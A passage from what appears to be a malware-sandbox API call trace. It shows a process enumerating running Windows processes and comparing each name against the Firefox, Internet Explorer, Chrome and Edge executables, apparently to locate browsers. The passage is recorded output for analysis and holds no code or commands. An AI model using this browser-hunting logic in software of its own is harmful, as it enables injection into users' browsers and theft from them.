(lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0205.778] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0205.778] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0205.778] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.778] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0205.779] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0205.779] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0205.779] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0205.779] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.779] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0205.779] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0205.780] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0205.780] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0205.780] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.780] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0205.780] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0205.780] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0205.780] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0205.780] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.780] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0205.781] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0205.781] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0205.781] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0205.781] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.781] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.781] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.781] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.781] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.781] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.781] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.782] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.782] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.782] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.782] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.782] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.782] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.782] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.782] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.782] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.782] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.783] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.783] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.783] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.783] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.783] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.783] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.784] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.784] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.784] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.784] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0205.784] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0205.784] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0205.784] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0205.784] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.784] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.785] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.785] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.785] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.785] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.785] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.785] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.785] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.785] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.785] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.785] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0205.786] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0205.786] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0205.786] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0205.786] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.786] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0205.786] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0205.786] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0205.786] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0205.786] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.786] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0205.787] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0205.787] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0205.787] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0205.787] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.787] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.787] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.788] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.788] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.788] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.788] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0205.788] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0205.788] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0205.788] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0205.788] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.788] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0205.789] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0205.789] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0205.789] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0205.789] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.789] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0205.789] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0205.789] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0205.789] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0205.789] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.789] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0205.790] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0205.790] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0205.790] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0205.790] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.790] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0205.790] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0205.790] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0205.790] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0205.790] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.790] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0205.791] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0205.791] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0205.791] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0205.791] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.791] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0205.791] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0205.791] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0205.791] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0205.792] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.792] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0205.792] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0205.792] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0205.792] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0205.792] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.792] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0205.793] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0205.793] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0205.793] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0205.793] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.793] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0205.793] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0205.793] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0205.793] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0205.793] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.793] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0205.794] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0205.794] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0205.794] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0205.794] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.794] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0205.794] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0205.794] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0205.794] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0205.794] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.794] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0205.795] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0205.795] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0205.795] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0205.795] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.795] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0205.795] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0205.795] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0205.795] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0205.796] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.796] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0205.796] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0205.796] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0205.796] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0205.796] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.796] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0205.797] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0205.797] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0205.797] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0205.797] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.797] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0205.797] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0205.797] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0205.797] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0205.797] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.797] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0205.798] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0205.798] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0205.798] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0205.798] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.798] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0205.798] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0205.798] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0205.798] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0205.798] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.798] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0205.799] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0205.799] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0205.799] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0205.799] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.799] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0205.799] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0205.799] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0205.799] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0205.800] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.800] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0205.800] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0205.800] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0205.800] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0205.800] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.800] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0205.801] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0205.801] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0205.801] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0205.801] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.801] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.801] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.801] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.801] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.801] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.801] Process32Next (in: 